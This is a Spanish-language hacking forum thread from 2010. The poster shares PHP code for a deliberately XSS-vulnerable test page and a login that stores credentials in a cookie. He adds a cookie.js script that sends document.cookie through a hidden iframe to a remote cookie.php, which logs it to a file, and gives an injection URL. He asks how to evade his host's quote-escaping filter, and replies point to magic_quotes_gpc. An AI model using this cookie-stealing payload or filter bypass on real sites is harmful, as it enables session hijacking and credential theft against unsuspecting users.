Problema con añadimiento en codigo

Iniciado por Dr [F], 29 Julio 2010, 04:42 AM

0 Miembros y 1 Visitante están viendo este tema.

Dr [F]

Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

<?php
session_start
();
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>


busca.php


<?php
$bus 
$_REQUEST['busca'];

echo (
$bus);
?>


pag2.php

<?php
$user
=$_POST['nombre'];
$pass $_POST['password'];
if (
$user == "franco"  && $pass == "franco")
{
setcookie("senia"$user."-"$passtime()+60*60*24*365"/");
echo 
"Bienvenido $user";
}
else
{
echo 
"usuario o contraseña incorrcto:";
}
?>


cookie.js


document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

<?php
$cookie
=$_GET['c'];
$file=fopen('archivo.txt''a');
fwrite($file$cookie.' - ');
fclose($file);
?>



esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->




Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)


"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Ari Slash

no se que filtro ni nada xD

pero prueba en este hosting www.zymic.com
para pruebas si que es bueno


saludos

Dr [F]

no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)

igual gracias por la respuesta :)
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Shell Root

Código (javascript) [Seleccionar]
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
No entiendo el porque escapas las comillas dobles. No debería ser así: (Además de cerrar bien la etiqueta <script>)
Código (javascript) [Seleccionar]
<script src="http://www.pruebas18p.webcindario.com/cookie.js"></script>
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Dr [F]

disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles  :-[.

Podrias expresarte mejor ?

Muchas gracias
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Erfiug

si pones un backslash delante de las comillas es para indicar que quieres mostrar ese carácter (las comillas) y no para delimitar un string.

Dr [F]

creo que no me entendieron -.-

<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script>


ese codigo lo añade mi arroba, yo pongo este:

http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>

yo no añado los backslashes, los añade mi arroba

PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

~ Yoya ~

Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...

Info:
http://foro.undersecurity.net/read.php?15,6470
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Shell Root

Cita de: frankitox en 31 Julio 2010, 23:57 PMhttp://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
Analiza ese código y comparalo con este ejemplo.
<bHola</b>
Está bien cerrada la etiqueta?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Dr [F]

miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon  :-[
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]